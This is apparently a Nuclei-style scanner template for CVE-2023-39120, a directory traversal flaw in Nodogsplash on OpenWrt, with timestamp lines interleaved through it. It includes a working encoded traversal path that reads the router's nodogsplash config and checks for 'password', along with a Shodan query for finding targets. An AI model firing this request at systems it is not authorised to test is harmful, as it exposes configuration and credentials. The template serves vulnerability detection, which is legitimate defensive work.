2023-08-05 08:48:31 +00:00
id : CVE-2023-39120
info :
name : Nodogsplash - Directory Traversal
author : Numan Türle
severity : high
2023-08-07 08:19:40 +00:00
description : |
Nodogsplash product was affected by a directory traversal vulnerability that also impacted the OpenWrt product. This vulnerability was addressed in Nodogsplash version 5.0.1. Exploiting this vulnerability, remote attackers could read arbitrary files from the target system.
2023-08-05 08:48:31 +00:00
reference :
- https://nvd.nist.gov/vuln/detail/CVE-2023-39120
- https://github.com/nodogsplash/nodogsplash/commit/a745a5d635925d2a6f0e0530bdc0eac645b672ed
2023-08-07 08:19:40 +00:00
- https://gist.github.com/numanturle/55cb758bacc4930a081e79c2a6a769b6
2023-08-05 08:48:31 +00:00
- https://github.com/openwrt/routing/pull/997
remediation : Apply all relevant security patches and product upgrades.
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
cve-id : CVE-2023-39120
cwe-id : CWE-22
2023-08-07 08:19:40 +00:00
metadata :
verified : true
max-request : 1
shodan-query : title:"OpenWRT"
2023-08-05 08:48:31 +00:00
tags : cve,cve2023,lfi,openwrt,nodogsplash
http :
- method : GET
path :
- "{{BaseURL}}/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/config/nodogsplash"
2023-08-07 08:19:40 +00:00
matchers-condition : and
2023-08-05 08:48:31 +00:00
matchers :
- type : word
part : body
words :
2023-08-07 08:19:40 +00:00
- "nodogsplash"
- "password"
condition : and
- type : word
part : header
words :
- "application/octet-stream"
- type : status
status :
- 200